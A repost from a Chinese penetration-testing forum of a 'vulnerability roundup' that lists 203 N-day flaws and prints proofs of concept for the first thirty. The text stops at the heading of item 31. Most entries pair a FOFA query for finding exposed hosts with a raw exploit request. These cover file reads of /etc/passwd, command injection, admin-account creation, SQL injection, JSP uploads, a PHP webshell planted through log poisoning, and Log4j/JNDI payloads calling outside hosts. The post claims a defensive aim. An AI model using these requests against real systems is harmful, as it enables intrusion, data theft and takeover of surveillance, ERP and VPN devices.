中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Public Internet Vulnerability Roundup 202309-202406 (repost)

Author: admin    Time: 2024-6-5 14:31

Public Internet Vulnerability Roundup 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界; author: 网络安全新视界

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of real-world attacks. We hope this article helps defenders; defensive teams can use its contents to check their exposure.

Vulnerability sources: This article covers 203 public PoCs for high-impact vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites on the Internet and compiled and published by the 网络安全新视界 team.

Security patches: All vulnerabilities are public. For patches or remediation guidance, contact the product vendor.

Article content: Because of length limits, a few overly long PoCs are replaced with the word PAYLOAD; search for the full PoC yourself if you need it.

Legitimate rights: If any content infringes a party's legitimate rights, contact the 网络安全新视界 team via the account backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the most complete version available; open the browser developer tools (F12) and search for keywords.

Bookmark this article if it is useful to you, and follow the public account (网络安全新视界).

01 Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 one-face smart management platform 1.0.55.0.0.1 privilege bypass
66. 万户 ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin account creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达 Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging PACS WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking payment system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 project management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

02 POC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"

GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"

GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace password with the MD5 hash of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"

GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"

GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"

Log in to the admin backend with the default admin account, then perform the following.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained in the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"

GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the following statement, double URL-encoded:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"

GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"

Step 1: obtain the cookies first.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request that writes the function; the command it executes is passed base64-encoded.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to run the id command; the request header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"

GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"

The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"

The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"

The PoC calls a database function that computes the MD5 hash of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"

GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"

GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"

GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"

POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

The uploaded file is then reachable at:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
